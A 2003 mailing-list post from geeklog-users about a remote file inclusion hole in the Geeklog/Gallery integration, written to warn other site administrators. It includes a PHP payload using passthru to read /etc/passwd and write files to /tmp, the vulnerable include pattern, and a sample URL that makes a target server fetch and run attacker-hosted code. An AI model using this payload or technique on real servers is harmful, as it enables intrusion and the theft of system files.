[geeklog-users] Geeklog/Gallery vulnerability
Jason Signalness
jason at btiadmin.net
Tue Dec 9 17:43:26 EST 2003
Dirk Haun wrote:
>Jason,
>
>
>
>>This article worries me a bit:
>>http://www.securityfocus.com/guest/24043
>>
>>
>[...]
>
>
>>The vulerability discussed allowed me to write arbitrary data to the
>>server's hard disk, run all kinds of shell commands, and get the output
>>back in my browser. Worrying to be sure.
>>
>>
>
>Hmm, I've only skimmed the article yet but my first impression was that
>it a) was "only" a problem of the Geeklog/Gallery integration (not of
>Geeklog itself) and b) was "only" used to send spam.
>
>I must have missed the bit about writing to the server's hard disk, but I
>don't really have the time now to look into it. Can someone confirm if
>this is "only" a problem with the Gallery integration?
>
>bye, Dirk
>
>
>
>
Hello again,
The article didn't mention writing to the server's hard disk. I was
able to do that myself after reading the article. It's not hard, once
you get the basic idea.
Essentially, this allows you to feed PHP script to a remote server,
which will then execute it. So, if your server is running Gallery &
Geeklog, I can make your server execute this:
<?
passthru('cat /etc/passwd');
passthru('echo "MY DATA HERE" > /tmp/mydataonyourdisk.file');
. . .
?>
As far as I know, this is possible anywhere someone does something like
this:
include('$VARIABLE/file.php');
A user in the know could construct a URL like
http://yoursite.com/blah.php?VARIBLE=http://mysite.com/mycode.php.
I'm not an expert by any means, so if this doesn't make sense or is
wrong, let me know.
-Jason
More information about the geeklog-users
mailing list